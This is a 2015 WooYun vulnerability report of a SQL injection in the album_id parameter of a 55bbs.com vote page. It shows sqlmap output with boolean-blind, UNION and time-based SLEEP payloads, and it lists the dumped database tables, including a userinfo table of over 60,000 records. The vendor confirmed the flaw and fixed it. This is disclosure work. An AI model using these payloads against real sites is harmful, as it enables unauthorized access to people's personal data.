乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-19: 细节已通知厂商并且等待厂商处理中 2015-05-20: 厂商已经确认,细节仅向厂商公开 2015-05-30: 细节向核心白帽子及相关领域专家公开 2015-06-09: 细节向普通白帽子公开 2015-06-19: 细节向实习白帽子公开 2015-07-04: 细节向公众公开
http://hunjia.55bbs.com/files/activity/vote.php?album_id=79&t=3
album_id参数~
1380张表:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: album_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: album_id=79 AND 6188=6188&t=3 Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: album_id=-6651 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7174736571,0x6870676d654e4e6f6442,0x7171786971)#&t=3 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: album_id=79 AND SLEEP(5)&t=3---web application technology: Apache 2.2.25, PHP 5.3.27back-end DBMS: MySQL 5.0.11Database: 55user[1380 tables]+-------------------------+| 2013_topic_LG || 55_bao10_3phplog || 55_bao10_7_4 || 55_bao10_accesslog || 55_bao10 || 55_vote_0 || 55_vote_config || 55_vote_index || 55_vote || active_answer_20121106 || active_answer_cate || active_answer_user || active_tid_pid_relation || activity || activity_0 |*************************** 这部分被我删掉了**************************| activity_999 || activity_egg || activity_info || activity_panting || activity_photo_396 || activity_photo_399 || bride_album || bride_photos || bride_vote || bwxn || bwxn_2012 || bwxn_2013_error_log || bwxn_2013_jiangpin || bwxn_2014_prize || bwxn_2014_prize_log || bwxn_2014_user_pic || bwxn_2014_userinfo || bwxn_2014_vote || bwxn_basenum_2012 || bwxn_bbs_score_2012 || bwxn_check_code_log || bwxn_code || bwxn_myshop_2013 || bwxn_phone_2013 || bwxn_shop_info_2013 || bwxn_sms_recode_2013 || bwxn_sms_record_2012 || bwxn_store_2012 || bwxn_store_score_2012 || bwxn_temporary_2012 || bwxn_unique_code_2013 || bwxn_userinfo_2013 || bwxn_vote_2012 || bwxn_vote_2013 || bwxn_win_info_2013 || ci_book || ci_rights || ci_user || del_param_log || duowei_useinfo || duowei_vote || eanhk_sn || group_data || info_param || ip_tj || jiehun_act || log_exceldata_2012 || log_exceldata_2013 || m_activities || m_albums || m_ip_logs || m_photos || mnls_userinfo || moto_userinfo || moto_vote || param_cate || param_dict || qmshangwang || qmshangwang_tids || qmshangwang_users || recipient || s11_2014_code || s11_2014_prize || s11_2014_prize_log || s11_2014_userinfo || saiban_photo || saiban_userinfo || sms_hack_log || sms_info || sms_params_log || sony_data || sony_vote || sunny_396 || sunny_vote || tbl_div || tbl_module || tbl_tid_fid || tbl_tongji || tbl_tongji_hour || user_20101002 || user_blacklist || userinfo || username_data || win_info || wizard_userinfo || wizard_vote |+-------------------------+
userinfo表,6万多条信息
172个字段,只跑一个来看看吧~
危害等级:中
漏洞Rank:10
确认时间:2015-05-20 14:43
漏洞已补,非常感谢.
暂无